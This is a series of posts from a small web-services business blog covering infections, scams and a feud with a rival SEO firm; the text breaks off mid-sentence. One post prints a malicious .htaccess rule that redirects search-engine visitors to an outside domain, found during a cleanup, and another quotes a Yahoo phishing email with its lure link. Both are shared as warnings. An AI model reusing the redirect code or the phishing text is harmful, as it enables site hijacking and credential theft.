Two weeks ago, House Bill 2463 passed the Oregon House unanimously – 60 to zero to legally require computer workers to report any discovered child porn. Failure to do so can include a penalty of $6,250, up to a year in jail, or both.
Wow. Well it’s about time they all agreed on something – everybody claims to hate child porn, right? But wait – look at this closely – what does the law actually mean?
Much like many laws passed here in Oregon, I think this is a piece of poorly researched feel-good vote getting activity. It’s not that I’m a fan of child porn, but it should be MY right to make moral decisions about what I do, and the government has no business legislating this particular issue.
Back in 1999. I had a retail computer store and one of my computer techs found a cache of child porn, pretty sick stuff. I wrestled briefly with the morality of the issue but quickly realized it was none of my business.
To the best of my recollection, after (I think @jalbrecht2000 originally found it, and told @ckstanley) I got a quick legal consultation to make sure that some stupid law didn’t exist that could put me in jail for not turning him in, and we returned the computer unfixed, and I talked to him personally. In no uncertain terms I told him why we weren’t fixing it and that he was lucky I didn’t him in, and to never come back because he’ll always be “that kiddy porn guy” and he’ll be tormented.
That was how I chose to run my business, and other professionals should be free to run their business without this sort of government intrusion.
This short video is slightly technical at the beginning, but halfway through, I think its simplified enough that even a politician can understand why this bill needs MANY further revisions before it gets thrust upon the citizenship of Oregon.
Now what can you do about the issue? PLEASE SHARE this video with someone that you know, so maybe it will draw the attention of the Oregon Senate before it’s too late.
PDXTC & Search Commander, Inc.
11124 NE Halsey St. #481 Portland, OR, 97220 USA
scott@searchcommander.com • 503-946-6881
11124 NE Halsey St. #481 Portland, OR, 97220 USA
scott@searchcommander.com • 503-946-6881
This has been the most technologically devastating week of my life, and I consider myself extremely fortunate. Why “fortunate”? Because I had good backups and only lost two days of my life, instead of suffering permanent damage.
After two days of “fixing”, things are pretty much back to normal, but the time lost over the past three weeks for me, for two others on my team, and for several server admins and web developers is simply astounding. I suppose “wiped out” is a gross exaggeration, but it felt like it, and it could have been a catastrophe without great backups.
Computer Problems Are Not New To Me
Ever since puting my fingers on the keys of a Radio shack TRS-80, I’ve come across nearly every problem imaginable, from power outages causing dataloss, to all of the Windows insanity we’ve experienced in versions 3.x, 95, 98, ME, 2000, XP, Vista and Windows 7.
I’ve had viruses, hardware failures and plenty of human errors, but by the end of around 2002, after five years of doing computer service and networking for a living, I had learned enough about my fragile existence to implement some very efficient and workable backup systems.
After 2002, when I began focusing on Internet marketing and web hosting, and working almost exclusively online, I also had my share of trials and tribulations, and instead of managing just a few websites, we began dealing with dozens, then hundreds, and then thousands.
I think it’s safe to say that it’s been 7 or 8 years since I’ve actually had an active virus or serious problem like this on any computer - (other than my kids, who will download anything!)
But I Got Pwned
For those that aren’t aware, there is an annual contest called Pwn2Own that goes on every year. This years contest was held on March 24th, and the “winners” were announced on March 26th, 2010.
Someone in that contest discovered a security hole that allowed script injection through Internet Explorer 8. This meant that simply by visiting a webpage, the user could have their computer used for mnearly anything the hacker desired.
The versatility of this injection has no bounds, and heres a video of the harmless starting of the Windows calculator that was initiated simply by visiting a webpage.
Using this particular exploit, these cybervandals can deliver ANY virus or trojan that they want top, which can make your computer do anything at all.
From wiping your files, to installing a keylogger, or even turn your computer into a zombie spam machine, there’s pretty much nothing they can’t do – nothing.
Who’s Responsible?
Microsoft knew about this hole the very day it was announced, and presumably began working on a fix, but it took nearly 6 weeks, and they didn’t patch it until June 8th, a FULL 6 WEEKS after it was made public. (By contrast, Firefox was patched in 8 days, and Safari was done in 14 days.)
Hackers are able to mobilize a lot faster than Microsoft, and on approximately May 25th, using this particular exploit, I was infected with a brand new virus by visiting a web page in IE 8.
I’m not going to link to the virus, or mention the name because there are dozens of variations now, and it would be pointless, but as a result of that that first trojan, heres what slowly and insidiously happened to me over the course of the past three weeks:
- Stole FTP usernames and passwords
- Spread over network computers
- Stole a credit card number and charged
- Turned a machine into a spam zombie
- Added my email address to dozens of mailing lists – maybe hundreds
- My personal IP address was blacklisted on three spam lists
- Over 40 websites on various servers were hacked
It wasn’t until this past Friday, when the hacked pages started returning AGAIN to certain websites where I KNEW the FTP access had been changed, that I realized I had a much bigger problem – there was an active keylogger on my main machine. Aaggghhh!
What’s a Keylogger?
As the name implies, a keylogger logs your keystrokes and sends them back to the mother ship where sophisticated software algorithms (or vodka swilling jackasses) determine whether they’re credit cards, usernames, passwords or whatever else, then puts them to good evil use.
Thoughout the ordeal, multiple other viruses and trojans were added to our systems, and although they were usually caught immediately, the undetected root problem of an open “back door” remained, and there was nothing I could do to get rid of it without formatting and reinstalling.
Before you criticize me for not using what YOU consider to be the “best products” for protection, I’m going to point out that not only did I get it, but so did 7 people I know personally – including two of whom work for me. Each of those 7 people had what they felt was completely “updated and effective protection”.
What’s the moral of the story?
Besides the obvious, which is to use good real-time protection, keep it updated, and keep good backups, my only solution is to plan my vacation for first week of April each year, right after the Pwn2Own winners are announced.
Seriously, short of not using a computer, there’s NOTHING you can do to protect yourself, so keep your systems cleaned and scanned, and on a regular basis, when you KNOW your system is clean, change your FTP passwords to something highly secure, and keep them on PAPER – not in a file on your computer or saved in your FTP software. Being lazy (like I was) can cause you to do hours upon hours of work.
Either that or… use Macs?
I received a “threatening” email yesterday from Jeremy Wyss at Peak Studios that I just have to share here after posting it last night on Twittter.
Spurred on by ReTweets from internet marketers like Todd Mintz, Greg Boser, Aaron Chronster, David Mihm Michael Dorausch (OK, sorry, that’s too much work, but here are dozens more ) I ended up getting over 500 visitors to my old 2008 post from the Retweets alone in one night.
Now I’m not really the vindictive type, and I’m not always this petty, but God dammit I know when I’m right, and I’m not gonna back down here. Besides, it’s too important that our industry stop “search marketing firms” like this from damaging their clients.
Much like some high profile marketers I know of, like Shoemoney, SugarRae and Michael Gray, I don’t generally like to “call out “ other peoples behavior unnecessarily. But when they totally DESERVE it, or they’re complete and total idiots, I’m not afraid to let it rip, and this is one of those times.
Just minutes ago, the “axe fell” and this guy emailed the contact info of a bunch of domains he researched, some of which are my clients, some affiliates, (and some I’ve never even heard of) with a vague, non-specific and unsigned “warning” about me. (Score one for John Andrews here by the way, who told me a couple of years ago I was crazy to keep client references showing on my site. Guess you were right, John.)
A Quick History
Way back in October of 2008, Peak Studios sent some badly spun forum spam for their “search marketing services” to the search marketing forum which I’m a moderator for, over at SEMpdx. I thought it was sort of funny, so I Twittered it.
When I phoned Peak, not only didn’t see anything “wrong” with it, he defended it, and didn’t even see the irony. (Anyone that knows me realizes I believe there’s a time and place for spam, but that sure wasn’t it! 
We hung up sort of agreeing to disagree, and I dropped it, thinking “this guy just doesn’t get it”!
A couple hours later, this guy, the owner of Peak Studios, actually then phoned the number on the SEMpdx website and spoke to both Kent Lewis (the past president) AND to Ben Lloyd (the current president, where he DEMANDED that I take down my Tweet or else! Seriously!
When Ben told me, I was so ticked off that I wrote a post over at SEMpdx there about the ignorance of the Peak Studios forum spam activity, titling it “Spam is in the Eye of the Beholder”.
Just to clarify, this is the Peak Studios I’m referring to…
View Larger Map
That infuriated him of course, and after a few heated emails with the board, Ben informed him that the entire SEMpdx board of directors unanimously voted to leave my post up.
Ya know what he did then?
Instead of apologizing and perhaps looking within, Quince Wyss, then turned around and left fake negative reviews on the SEMpdx board member Google local business profiles. And this was AFTER 99 % of the internet marketing community pointed out the error of his ways in the comments at Sphinn.
I Lost It
The fake review on my own Google business profile REALLY had me smoked, so I blew up, and phoned him, leaving a screaming and profane voice mail for him that would have made my Dad blush.
What does he do? He edited and cut my voicemail to take out his company name or what I was accusing him of, and anonymously posted on YouTube, trying to make me look like a raving lunatic. (This, “raving lunatic” stuff came as no surprise to my wife or anyone that know me, because I was REALLY pissed.)
That recorded voicemail on YouTube sparked me to do some investigative digging into their history so I posted on my own blog in December of 2008 with a backstory and video showing exactly how Peak Studios was leaving deceptive fake “bad” reviews for their clients competitors!
I still stand behind that post 100%, and my decision to do it, and I was pretty happy to see that it too was supported by the entire Sphinn community. Even Tamar Weinberg from Techipedia thought it was worth mentioning in the Ultimate Social Media Handbook.
So, now you’re current and up to date, and oh, I forgot to mention that the post is ranking highly for their company name, and that’s why he contacted me yesterday after 14 months with his “threat”.
It’s interesting to note that from his perspective, the fact that Peak Studios spammed SEMpdx in the first place was is a total non-issue.
The poorly crafted and badly spun articles sent posted in a search marketing organization’s forum was bad enough, but the fact that they still defend it (below), and that they left us fake reviews for exposing them, and then were (or still are?) leaving damaging reviews for their clients competitors should be very enlightening to other marketers and bloggers in Colorado .
So, instead of being afraid of this supposed “blackmail threat”, I’m sort of proud to have my “clients” read the history here, as well as my family, friends, kids, parents, and anyone I ever have contact with, or may possibly in the future.
Thanks for the link bait Quince and Jeremy, and yes, I do plead guilty of having an ego – but I also have the business sense to understand when I’m wrong, and I’m man enough to admit it when that happens.
Verbatim and unedited, here it is below… (His stuff is red, and mine is blue and of course, read from the bottom up for context
This Email went out today to an unknown number of people – Unsigned, by the way, from a Gmail address, with all the typos and grammatical errors you see below-
From: Jeremy.wyss [mailto:jeremy.wyss@gmail.com]
Sent: Thursday, February 11, 2010 1:03 PM
To: Scott Hendison – Search Commander, Inc.
Subject: Scott hendison is not looking out for your best interests – recommend contacting him to discuss – here are the details
As a consumer I like to work with companies who always think about my best interest. Scott Hendison has been bashing our company for over a year now and when asked to stop he refused cause of his ego. He thinks it is a game or something.
I’d point out that after my December 2008 post, I really did nothing, and had in fact forgotten all about it. There’s was no “continual bashing” – certainly not like there will be now!
Well we have had just about enough and told him we would not be putting up with it anymore. We had given him 24 hours to remove his post that he claims is about us, unfortunately not all of his information is correct (What about the video proof I have for all of my claims on my original post?) and whenever we tried to respond he would not post it, cause he bashed us on his site and wanted everyone to think he was right (again with his ego).
( I never deleted or declined approval for any of his comments, and do encourage him to speak his mind here. Anyone can vouch for the fact that I love a good argument, and there’s no way I’d delete anything. Why would I? With every sentence they write, it makes them look worse and worse! )
The reason I am telling you this is cause it may have an impact on your company if you continue to work him and he doesn’t remove the requested items. I can only assume that he is well aware of the fact that the negative online reputation that he is getting, from being so negative towards others, will effect his clients eventually. The problem is that his ego makes him believe that his negative smear campaign against another company has no effect on his company or the companies he associates himself with, probably cause of his God complex. Well in todays world people do look at the companies that people choose to do work with as a marker of their professionalism. I for one would not want anyone to associate myself with a person like Scott who would rather hurt his clients than take 10 seconds to remove something.
I would strongly recommend calling him and letting him know that he was hired to look out for your best interests ( not drag your business name through the mud with his) and to remove the items immediately so everyone can go on with their life. In addition, he received this email too and is well aware that I am sending it to you, I guess he really just doesn’t care about his clients.
So that went out to clients, UNSIGNED I’d point out, with no links at all, or an explanation of anything. He even sent it from a cowardly Gmail address. How does this “hurt” me or my clients again? My last threat to SEND that email came from him came about an hour before he sent…
From: jeremy@peakstudios.com [mailto:jeremy@peakstudios.com]
Sent: Thursday, February 11, 2010 12:03 PM
To: Scott Hendison – Search Commander, Inc.
Subject: this is going out to your clients in 20 minutes if that stuff isn’t removed… this is step one are you sure you really want this?
this is going out to your clients in 20 minutes if that stuff isn’t removed… this is step one are you sure you really want this?
He had a rough draft here of the letter above, then he thoughtfully, included the entire text in this one email, which made this post easier.
First of all this isn’t Quince, 2nd of all the entire incident occurred cause of a misunderstanding, cause from looking at the sempdx it looked like we were aloud to post things about our company. Unfortunately, there was no disclaimer that said if you are on the board of sempdx please post and reply to people here. I was the one who posted the two blog comments and I never reposted them I edited them. Instead of being an adult and just clicking deleting them you decided to call and argue with Quince. We manage blogs too Scott,it is easy to just click a button or even better you don’t allow posts to go public until reviewed.
You saying I would not work this guy cause of this message is spam as you interpret it on your post, have you read what you wrote on our reviews?
Oh we know what we did towards you was not right I am the first to admit it, but we did it in retaliation for your comments about us on sempdx, your site and google maps along with your little social networking.
finally your vague answer to my question is wonderful, so you don’t care if you negatively effect your clients income.
You can look at it this way is it worth your time and energy to deal with the ramifications it is going to bring to you if you don’t remove it? It will take you ten seconds to remove it and it may hurt your ego a little bit but just think there are still posts bashing us at sempdx so you have won.That is the whole point you want to think you have won right? I can tell you for a fact the only way for you to win is agree your little game is over take your trophy, remove that stuff and move on with your life.
Scott Hendison – Search Commander, Inc. wrote:
You know, you’re probably not a bad guy, but you’re incredibly dense. I phoned you in the first place as a courtesy, one SEO to another, and you just didn’t get it. I TOLD you this would happen, and that I’d end up ranking for your name, but no, you didn’t want to listen.
Now you dare to threaten me with some imaginary loss of income? Are you serious? To retaliate I guess I’d just copy / paste this whole email as a new blog post. Care to bet on how fast I can get an indented listing for your name too? Maybe I’ll ask some friends if they’ll let me guest post on their blogs too, and take up some more page one real estate.
You’re asking ME if I “can’t stand to remove something?” Seriously? Dude, you’re the one that refused to take my voicemail off Youtube, and it cost me time, energy, a little stress, and more than a few bucks to get rid of it myself. (By the way, if you still have a recording, I’d love to have it, and I’ll post it myself)
My whole point is that you’ve never admitted the error of your spammy ways in the first place, and never apologized for the fake reviews you left me, because you still don’t think you did anything wrong.
You even had the balls to register variants of MY NAME with Google and for that alone I should come after you.
http://maps.google.com/maps/user?uid=112369592856088633717&hl=en&gl=us
http://maps.google.com/maps/user?uid=102014840258178979812&hl=en&gl=us&ptab=1
http://maps.google.com/maps/user?uid=103099292697466303277&hl=en&gl=us&ptab=3
http://maps.google.com/maps/user?uid=100424242897549655456&hl=en&gl=us&ptab=0
Not too smart for someone who’s own name .com is still available – (don’t worry, I wouldn’t stoop that low)
Anyway, thanks for sparking some more comments on that year old post today , by the way. Why don’t you just let this die off, before you become even more of a trending topic at Twitter http://search.twitter.com/search?q=peak+studios –
You’d better wise up, quit while you’re behind, and stop pissing me off or I really WILL make it my mission to drive you completely off page one for your own name. Believe me, I’ll find the time, with legitimate facts posted at a few domains, and a few choice links.
Go ahead, dare me to…
Scott
(PS – My apologies to those I’ve annoyed with my bcc, but please let me know if you’d either like to write about this fiasco, or might let me do a guest post in case this guy wants to continue to escalate)
From: Jeremy.wyss [mailto:jeremy.wyss@gmail.com]
Sent: Wednesday, February 10, 2010 3:20 PM
To: Scott Hendison – Search Commander, Inc.
Subject: Re: page removal – Peak Studios
So you thought about the effects it could have on your income and the income of the businesses you market for? really are you an adult or is your ego so big that you can’t stand to remove something?
Scott Hendison – Search Commander, Inc. wrote:
Gee, what’s wrong? Are you not happy with it ranking highly for your company name?
Do you really think I’ll respond to this by taking it down? Hilarious.
Sorry, but nothing about you on my site is coming down, because nothing there is untrue. Nothing.
I show my facts there pretty well, I believe. Frankly, I’d forgotten all about it, and have better things to do.
Also, NONE of my own Google reviews are anything less than 100% true, including my thoughts on my own dentist, my kids dentist, my kids school, my friend Randy, Marvin the fishing guide who took us fishing, David our mortgage broker since 1999, and so on. I’m not sure what your beef is with my REAL reviews, UNLIKE what you guys were doing - or for all I know still are – that’s what reviews are for! Do you really not comprehend the difference?
Don’t worry, I won’t contact you because I’ve got NO INTEREST in discussing anything with you, however, feel free to comment on the post in question.
Actually, lets see if people think I should remove it or not…
http://twitter.com/shendison/status/8922559578
I’ve also bcc’d the board of SEMpdx (who all remember the situation quite well) in case any of them want to weigh in, and I’m debating placing this email online as another post to outrank you for your company name…
Sincerely,
Scott Hendison
From: Jeremy.wyss [mailto:jeremy.wyss@gmail.com]
Sent: Wednesday, February 10, 2010 2:16 PM
To: scott@pdxtc.com
Subject: page removal.
You need to remove this page http://www.pdxtc.com/wpblog/viruses-and-scams/peak-studios-actually-harming-clients/ from your website along with the two reviews you and your friend left on peak studios local listings David Kyle reviews and the reviews in your own name within the next 24 hours. This is not a negotiation or discussion the 3 items will be removed within 24 hours. no point in contacting us to discuss we will just make sure it has been done by tomorrow at noon. If you need guidance I would look to your family, friends, the companies listed bellow and god to help you make your decision – I am sure they will lead you in the right direction.
(about 25 domains have been snipped out here for privacy – even though less than half ever were actual clients of mine)
Have a wonderful day and may god bless you!
So, there you have it, and thanks for reading. I’m sorry to waste your time, but this was just too rich to pass up. What do you think? Am I completely out of line?
We just fixed an instance of a domain which appeared fine when visited directly, but when coming from the search results, all users were being redirected.
Because of my recent personal virus experience redirecting my visits from search results I was thrown off at first, but it turned out that all users coming from search engines to that website were being redirected in a completely different way.
I found that the following code was placed in the .htaccess file at the root of the domain. :
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*yandex.* [OR]
RewriteCond %{HTTP_REFERER} .*rambler.* [OR]
RewriteCond %{HTTP_REFERER} .*mail.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*RewriteRule ^(.*)$ http;//sudnijdenprishel.com/gold/go.php?sid=6 [R=301,L]
(* note that I replaced the colon with a semicolon in the above url)
You can see what was happening here. the .htaccess file was either hacked, or came from the web designers computer, and it was causing all users being referred by any search engines listed to be reduirected to the sudnijdenprishel.com.
I looked up the Who-is info for sudnijdenprishel.com and found this, showing the domain is brand new:
Registrant:
PrivacyProtect.org
Domain Admin (contact@privacyprotect.org)
P.O. Box 97
Note – All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676Creation Date: 21-Jan-2010
Expiration Date: 21-Jan-2011Domain servers in listed order:
ns2.jino.ru
ns1.jino.ru
Since my search was being stymied by privacy, I tried looking up WHOIS information for jino.ru :
[Querying whois.ripn.net]
[whois.ripn.net]
By submitting a query to RIPN’s Whois Servicedomain: JINO.RU
type: CORPORATE
nserver: ns1.jino.ru. 217.107.34.200
nserver: ns2.jino.ru. 217.107.217.16
nserver: ns3.jino.ru. 217.107.219.170
state: REGISTERED, DELEGATED, VERIFIED
org: Avguro Technologies, Ltd.
phone: +7 495 2293031
fax-no: +7 495 2293031
e-mail: info@jino.ru
e-mail: info@avguro.ru
registrar: R01-REG-RIPN
created: 2002.11.27
paid-till: 2010.11.28
source: TCI
and fropm there, it’s not worth chasing down further, because I’m not Skyping into Kazakhstan.
Anyway, if users claim they’re being redirected, do these things:
- Check your website .htaccess file
- Scan your computer for any viruses, in case you’re the source in the first place, which is often the case.
- Change your FTP usernames and passwords to good ones (from a clean computer) just in case your password was hacked.
I was 45 minutes from leaving for the airport, moving stuff to my laptop, and tying up loose ends before traveling to Affiliate Convention. The last thing I needed was a computer problem.
Update 12/8 – I just got back, and it’s not fixed! Please see the bottom of this post where I’ll continue to add notes about resolution, or so see if I give up
Update 12/8 – all fixed (apparently)
I did a Google site: search for an item at SearchEnginewatch.com to send to a client, but when I clicked the result, instead of the article, I ended up at a different site entirely. Huh?
I hit the “back” button, tried the same SERP listing, and got a different page, almost as if it was randomized. Then I did a Google search for “dog food”, and from the the listings, 8 out of 10 results took me somewhere other than my intended destination. Something was REALLY wrong.
That’s when it dawned on me that about 10 minutes earlier, I had a 20 – 30 second lockup while visiting some other website (No, I don’t know which), and my Winpatrol warning went off, asking me, “Do you want to add this item to your Windows Startup?” Although I said “No” apparently something slipped by, and my Firefox was screwed.
Running out of time before leaving, I opened Internet Explorer, assuming it would be fine. Did a site: search at Google, and my SERPS had been hijacked in IE too.
I began running Malware Bytes, a process that would take a couple of hours, and used my laptop to Tweet out a message, where @DavidKyle replied with a link to “Hijack This” which allows you to see registry additions.
After spending 10 minutes in Hijack This checking boxes for things I KNEW things were fine, I added them to the “ignore” list, and was left with a couple dozen items to examine, but this was right at the top -
I browsed to my registry path, and yep, there it was, an IP address entered for proxy use.
In case you don’t know, a proxy allows you to surf the web by going through their IP address. Reasons for CHOOSING to use a proxy vary, but in this case, it looked like the owner of the proxy IP was forcing me to go elsewhere, to other websites.
I looked up thje owner of the IP address at Domain Tools, and it turned out to be owned by the University of Washington. Great – some bored kid, using the schoos resouirces to deliver who knows what sort of crap to my PC.
I decided to let Malware Bytes continue to run rather than make any attempt at fixing it, and I left for the airport, dwelling on it all the way there.
As soon as I made it past security, I logged in remotely to see if the Malware Byte scan had finished, and it hadn’t. Not only that, but it hadn’t found anything out of the norm, either.
So, rather than use HiJack This to “fix” the problem by removing the registry entry, I decided to open Internet Explorer and went to the Proxy settings, where I saw the offending entry.
The box was NOT checked to use a Proxy, however, I could see the offending IP in the grayed out section.
All I had to do was check the box, delete the IP and port entries, hit OK, and then UNcheck the box again. I did a quick search at Google, and the problem was gone – Nice.
I can’t say for sure that this fixed everything, and I’ll likely have to get into Firefox and do the same thing, but I’ll bet dollars to donuts that’s it.
I was running IE8 and FF3, both patched with the absolute latest security fixes. I have a firewall, AntiVirus, and a startup protector that SHOULD have prevented this problem. Apparently, we’re not as safe as we like to think.
I’m writing this on the plane, but I’ll post it with screen shots when I get in later today – (right after I see if proxyaffiliatemarketing.com is available for registration
*Update – 12/07 8am
After returning to Portland home and getting back to work this morning, my clicks into SERPS were still not coming up correctly `100% of the time, so I ran “Hijack This” again, and removed the offending entries that way. I’m sure I might have been able to solve it with enough time, but I really don’t have it to spare. All seems AOK now.
*Update – 12/07 noon
Back in serps after email catchup, and.. Agghh – it’s back. My registry seems clean, the Hijack This logs still show clean, but I’m still being redirected about 10% of the time, even after a reboot.
To be clear, here’s what I’ve done:
- Removed the obvious problem using Hijack This
- Manually verified removal from the registry
- Found over a dozen places undergoing troubleshooting
- Found one sales pitch disguised as a solution at Ezine Articles
- Using Google Wonder Wheel and Twitter Search but still found nothing concrete
to be continued…
12/8 -
Thanks to my Twitter search, I found someone who says below that Combofix worked for them, so I tried it from the only authorized US source for Combofix . Although the entire process tok more than two hours to run, in the end, I came out clean, and today I’m back to work. Hooray!
Read (and print) these instructions carefully throughout the process
There seems to be a new scam going around, that’s a new twist on an old game.
The old scams set out to steal your domain names under the banner of Liberty names of America“ or “Domain Registry of America“ and the way they do it is to send domain owners what appears to be an invoice for domain registration renewal.
Once paid, then the owners lose control of their domain names, often not finding out for months or years, until they need to change DNS, and that’s when they find out they don’t own it anymore..
This morning I got another e-mail that appeared to be the same thing, but upon closer examination, I can see that they don’t want to be bothered by anything as pesky as owning your domain name, and they have no intention of robbing you year after year.
Instead, this one is merely a solicitation for “search engine registration” and they’re after one thing – your money.
If you read the fine print carefully you’ll see that…
- “This is not an invoice”
- It’s for “Search Engine Registation”
- It’s a “solicitation”
- “This notice is not in any part is associated with a continuation of services for domain registration.”
At least you won’t lose your domain if you fall for this scam, but you will lose up to $295. Here’s what to watch for, by email, with the subject line – “Domain Notification: [sic YOUR NAME] This is your Final Notice of Domain Listing [sic Your Domain Name]
Here’s what the letter contains…
I suppose someone will argue that since they DO specify details, that it’s not a scam, but seriously – “search engine registration”? Really?
If someone from the company would like to reply here and tell people what they do get for their $300, I’ll certainly allow it to be posted…
Did you get a twitter message that says this? rofl – this you on here? – Then that’s followed by a link to see a video, but is appears as if you’re suddenly logged out of Twitter? Don’t be fooled and DON’T log in !
It’s a Twitter phishing scam to get your password, and then to spam your own followers, to get their passwords!
If you’ve already fallen for it, don’t feel too bad, jsut go and change your password right away.
If you haven’t fallen for it, then please retweet this, and tell your friends to watch out also, because it could get really ugly pretty fast.
If this isn’t perfectly clear to you, and watch the video below…
In light of recent news about Microsoft and Yahoo search, I almost fell for this bogus e-mail, which is a phishing expedition for usernames and passwords.
The fact that I’ve been advertising an affiliate offer heavily in Yahoo Sponsored Search over the past three weeks, and the fact that I just read about a new user interface coming soon, put Yahoo it in the forefront of my mind.
I was only at the last second that I caught a glimmer of potential fraud – and sure enough, it’s a scam. Note the domain name is NOT Yahoo, but that won’t show up in the .html version of the email.
Dear Advertiser,
We just want to remind you that, on August 25, 2009, your Local Sponsored Search account will be discontinued. You will be upgraded to a new Sponsored Search account with geo-targeting and other great new features.
Please note the following: In order for us to upgrade your account you need to verify your user/password of your account. Please remember to input your Sponsored Search user and password correctly NOT your email and password.
Please visit the following link to verify your account:
http://marketingsolutions-yahoo.com/adui/signin/loadSignin.htmSincerely,
Your Partners at Yahoo! Search Marketing Copyright 2009 Yahoo!, Inc. All rights reserved.
Had I been just a few seconds slower on the uptake, I probably would have found myself with dozens or hundreds of ad campaigns for someone elses domains, and maxed out credit cards. Yikes!
I looked up the domain name just to be sure…
Any time your credit card or finances are even remotely involved, never, ever, should you click on a link in an email where you are being asked to verify your username and password for ANYTHING.
If in doubt, always manually type in the domain name of the real merchant or go to your bookmark / favorite to see if a request is legit.
In the fall of 2008, a Portland Oregon small business owner found a local developer, and told him that she’d like to have her website redone, and she wanted some search visibility.
Her current site was old, not showing in the results, and she’d lost track of the original web designer.
So, after a few emails, phone calls and meetings, she signed a contract for $1500 down and about 6k over 6 months, after which she assumed she would have a new optimized website, they would part ways. What she got though, was something completely different.
(The fact that the end product had duplicate title and description tags throughout the site is neither here nor there, and whether a “good job’ was done on the SEO is pretty irrelevant at this point, but I thought it should be said here.)
In the spring, after making over $5k in payments since December, she could no longer pay his $550 “maintenance” charge, and wanted to cancel anything ongoing. Plus, she claimed, she never got any form submissions or phone calls, and she was really disappointed.
At this point, after a couple of emails and a phone call, he tells her that it will cost $3150 to both “finish”, and for him to then “give her all the files”.
Also, since she wasn’t paying anymore, and (he says) she owes him money), he told her that if she didn’t pay, was “taking the site down” as of July 1st!
Now (late June) there’s a disagreement that can’t be rectified, so she needs to do something quick, and that’s when she phoned me, after being referred.
Unfortunately, I eventually found out that she doesn’t own her domain anymore, and that he had stolen it.
How did this happen?
First he explained that he could not use her Yahoo small business account for hosting because they were awful (I agree and she needed to transfer it to another host.
That means that he simply needed to change her DNS settings a.k.a name servers to change hosts.
That made sense to her, and she didn’t understand all this technical stuff anyway, so she gave him all her usernames and passwords for “web stuff” that she knew of, to make the transition easier.
Next, however, is where this guy crossed the line in my opinion…
Her web host was Yahoo, but she had purchased her domain name from them too, which made Yahoo (Melbourne IT) her registrAR too. (You probably see where this one’s going…)
He told her he needed to “get it off Yahoo” (which I’ve said often enough but in doing so, he apparently changed the registAR too, over to one of his own control.
When changing the registrAR, you get an option to keep the same contact details or enter new ones, and he also changed the registrANT as well, as of 12/2008, so he owns it. That’s like having a contractor come in to drywall your basement, and they change the house into their name instead of yours on the deed!
Of course, he was extra sneaky by also adding “Privacy Protection”, so there’s no easily seen public record. The registrant just shows as proxied@Dreamhost etc. but it’s clear what happened.
Contacting Dreamhost was pointless, because it was a done deal, and they’ve NEVER HEARD OF HER AND WILL NOT TALK TO US.
Well, July 1st, this guy has removed the domain from his host, and there’s an empty index folder. we can’t change DNS, because she no longer owns it. We changed domain names, and she now has to get a lawyer involved.
My Recommendation?
I believe this guy is guilty of theft by fraud, and I told her to attempt to file a report with the Portland Police, and to please tell me what they say. I also recommended that she contact a lawyer to sue this guy.
At this point we’re getting her up with a new domain name, but don’t let this happen to you! Be 100% sure you know all this stuff about your domain name.
I’ll update this post with more details as they unfold…
A dozen years ago or so, I had one password that I used for everything, and it wasn’t until some bad experiences that I understood the wisdom of having stronger passwords.
That said, to this day, I have some very simple passwords for literally dozens of online accounts I have in various places, because there’s really only so much need for security on certain accounts, but they’re not common words from the dictionary.
I also have some accounts that I would obviously not want to fall into the wrong hands, but I’m also not willing to give up my most secure passwords to these companies either, and for those I use a different password.
Finally, for logging into credit card company or financial institution sites require an inordinate amount of caution, and that’s why I have three personal “password levels” that I use. While they’re all completely easy for me to remember, they’re not going to be randomly guessed by some software or ‘bot.
Long before I started using Firefox, I either had to remember my passwords or buy Roboform for every computer, so I derived a system that made some sense to me, since I often found myself frustrated by forgetting my passwords.
Jumping ahead to 2009, privacy and security have never been more important, and the odds are you haven’t begun using stronger passwords, have you?
After a recent very ugly hacking of a website on our hosting, where the FTP password was set to “password”, I’d like to do recommend that you go change some of them right now.
In my opinion, you absolutely must to create a stronger password for your:
- E-mail accounts
- Web property logins & FTP access
- Web logins that have financial implications
Why use a stronger email password?
With a simple e-mail password, hackers can run scripts on mail servers trying common usernames and common passwords, and frequently they are successful gaining entrance to someone’s Web mailbox.
When someone gets access to a mail server with a username and password that validates, they can easily point their zombie spam machines to your mail server and begin to send out millions and millions of e-mails hour after hour. This does a couple of things, including bringing your mail server to its knees and getting everyone that’s hosted on that mail server banned for a least a few hours while the mess gets cleaned up.
Why use a stronger web / FTP password?
Most hackers aren’t content anymore with just defacing your site, now there’s a purpose to their hacking, i.e. some sort of financial gain.
When someone gets access to your Web logins and they can change your site, they’re also able to upload malicious scripts that can infect unsuspecting site visitors with various viruses, malware, adware and spyware.
In the old days, when spyware was relatively new, you could usually always tell when you add some crapware on your site because your system ran poorly, and this led to the rise of various spyware removal and prevention software.
Today however, the crapware designers do a much better job, and it’s highly likely that if you get spyware from a website, you may not even notice a performance hit. As the industry has become much more lucrative, talented programmers can write software to do their bidding on your PC without you even noticing.
For all you know, some well-written spyware could be using your home computer to log in at 11 at night to send a few thousand e-mails out, and be completely done by 3 a.m. only to sit dormant and not affect your regular daily use.
Why use stronger Financial Passwords?
Well, duh – For your online banking and purchasing, someone could conceivably log in as you, and trade stocks, transfer funds, and basically wipe you out financially just as surely as if you let the government do it for you.
That’s why you need secure passwords, and you need password you can remember.
How can you create a secure yet memorable password?
Secure passwords should have a combination of both upper and lower case letters, as well as numerals, to keep the hackers at bay,, and here’s my preferred way to create secure passwords that I can’t forget…
Think of an event that has some meaning for you and think of it as a written sentence. then use the first letter of each word, and the numbers for your password.
For example -
“My dog Fido died on May 10 1990” and your password would be MdFdoM101990
Or -
